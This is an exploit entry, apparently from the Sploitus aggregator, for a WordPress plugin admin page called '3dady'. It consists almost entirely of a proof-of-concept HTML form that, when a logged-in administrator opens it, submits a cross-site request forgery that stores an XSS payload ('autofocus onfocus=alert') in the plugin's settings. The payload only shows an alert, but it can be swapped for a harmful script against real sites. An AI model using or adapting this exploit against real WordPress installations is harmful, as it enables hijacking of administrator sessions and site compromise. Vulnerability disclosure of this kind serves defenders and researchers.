Share
## https://sploitus.com/exploit?id=WPEX-ID:36EE3733-28B3-48DD-BA1E-08B7BBE2FE2D
Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin.php?page=3dady" method="POST">
    <input type="text" name="dady_submit_hidden" value="Y">
    <input type="text" name="dady_input_text" value='" autofocus onfocus=alert(/XSS/)>'>
    <input type="text" name="mth_submit_hidden" value="Y">
    <input type="text" name="dady2_input_text" value='XSS2'>
    <input type="submit" name="submit" value="Save+Changes">
</form>